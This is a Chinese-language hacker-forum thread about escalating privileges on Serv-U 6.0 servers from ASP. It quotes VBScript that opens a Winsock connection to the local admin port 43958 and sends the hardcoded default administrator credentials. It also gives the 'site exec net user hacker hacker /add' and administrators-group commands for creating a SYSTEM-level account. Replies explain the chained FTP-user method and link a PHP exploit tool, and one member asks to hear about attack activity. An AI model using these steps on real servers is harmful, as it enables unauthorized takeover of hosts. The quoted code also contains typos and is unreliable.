[讨论]Serv-u6.0提权新招（结帖） 权新招, 讨论

jjcd

[讨论]Serv-u6.0提权新招（结帖）
议题提交：宿心劫

第一次见到这段码时 认为是不可能的 因为控件的问题
现在听KEVIN的分析 就够了
我提出的第二个问题 是因为我没绕过一个弯
引用:
来源：黑客防线
适用环境：服务器禁用FSO，关掉Wscript.shelll,没有执行权限。
限制：没有更改管理员的密码，或者破解出了Serv-U的管理员的密码。Serv-U默认用户名：localadministrator? 密码：#|@$ak#.|k;0@p???下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户，代码如下：
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)

Sock.senddata.sendata
  
使用这个代码就可以连上FTP了，接下来用Sock.senddata sendata 发送添加有执行权限用户的命令，想必大家该知道怎么做了吧，对了，就是用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add”
呵呵，就这样系统权限到手了，祝大家好运！
我有两个问题
一、MSWINSCK.OCX控件为VB 网络支持库  系统是不自带的
参考文章《关于VBS调用MSWinsock控件》
http://www.eviloctal.com/forum/read.php?tid=8748&fpage=1

二、文中提到"下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户"
我想问一下  这段本地提权的码 真的有system权限吗风停了 又吹 我忽然想起谁天亮了 又黑 我过了好几岁心暖了 又灰 世界有时候孤单的很需要另一个同类

帖子108 精华4 积分3417 阅读权限100 性别男 来自浙江 在线时间3 小时 注册时间2004-12-19 最后登录2008-4-20 查看详细资料TOP 赚更多的钱

kevin1986
荣誉会员

揸拖拉机入西藏

恩....这样的主机的确是很少,不过我曾经遇见过有安装过VB的主机,这样的主机是可行的.因为MSWINSCK.OCX在VB中带的,所以可以用来创建连接.
而文章中说说的是向Serv-U的43958端口发包,也就是Su.exe这类提全工具的原理..明白否?me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华12 积分3936 阅读权限100 性别男 在线时间308 小时 注册时间2005-2-5 最后登录2007-9-3 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

宿心劫
荣誉会员

Nicky

提权的原理我一直都清楚
只是对那个控件表示怀疑
但Su.exe提权需要能够被执行（权限要求是有的）
而且文中提到是以system权限添加超级用户
我就不懂了
ASP执行时有那么大的权限？风停了 又吹 我忽然想起谁天亮了 又黑 我过了好几岁心暖了 又灰 世界有时候孤单的很需要另一个同类

帖子108 精华4 积分3417 阅读权限100 性别男 来自浙江 在线时间3 小时 注册时间2004-12-19 最后登录2008-4-20 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

我非我
荣誉会员

aaronliu

原理是和kevin说的一样。不过上面的ftp添加用户的语句没有给全。你可以到su.exe的原码里找。但如果是直接用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add” 这样发到43958是没用的。因为localadmin是没法执行。
你添加了ftp有执行权限的用户后再利用这个ftp用户添加系统用户。此时会有权限。因为它此时继承的是servu的权限。不是iisuser的了。
你看我的servuexp的php版的代码应该可以看懂。思路一样的。只不过这个代码是asp的，而且不太通用罢了。http://www.phpweblog.net/GaRY/

帖子150 精华6 积分5639 阅读权限100 性别男 在线时间189 小时 注册时间2005-2-4 最后登录2008-1-31 查看详细资料TOP

kevin1986
荣誉会员

贝贝猫

不是呢...
那个控件是没问题了.
只是,用ASP调用这个控件对43958端口发送一串添加具有可执行的FTP帐户的包,然后再通过Serv-U来执行命令达到提升权限的目的.
这个相当于小我的SERV-U提权PHP程序的ASP版本吧.我曾经成功过的me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华12 积分3936 阅读权限100 性别男 在线时间308 小时 注册时间2005-2-5 最后登录2007-9-3 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

撕碎了的小C
技术核心组

pat1110

如果可以向管理端口发送数据的话，得到的权限理论上应该跟SERV-U一样，如果SERV-U是以服务启动的话就可以得到SYSTEM权限。我是金子，我要闪光的....!
帖子128 精华4 积分3748 阅读权限200 性别男 来自湖南 在线时间124 小时 注册时间2005-1-28 最后登录2008-7-8 查看详细资料TOP 少女暴富的隐秘（图）

serenade
晶莹剔透§烈日灼然

Ange细

如果SERV-U是以服务启动的，但是是以guest组用户启动的（组策略＋服务设置），那么。。。不行。。。
帖子8 精华0 积分7 阅读权限40 在线时间51 小时 注册时间2005-6-3 最后登录2008-7-2 查看详细资料TOP 让女孩一夜变的更有女人味

shoojun
晶莹剔透§烈日灼然

CID6

那就必须在端口下工夫了！有什么攻击活动请告诉我！！！

帖子12 精华0 积分11 阅读权限40 性别男 来自E.S.T 在线时间0 小时 注册时间2005-3-24 最后登录2005-7-19 查看个人网站
查看详细资料TOP

mlove
mlove

dgyys

提示: 作者被禁止或删除 内容自动屏蔽
帖子20 精华0 积分-6 阅读权限0 性别男 来自邪恶八进制 在线时间8 小时 注册时间2008-1-8 最后登录2008-4-7 查看详细资料TOP

gxm
荣誉会员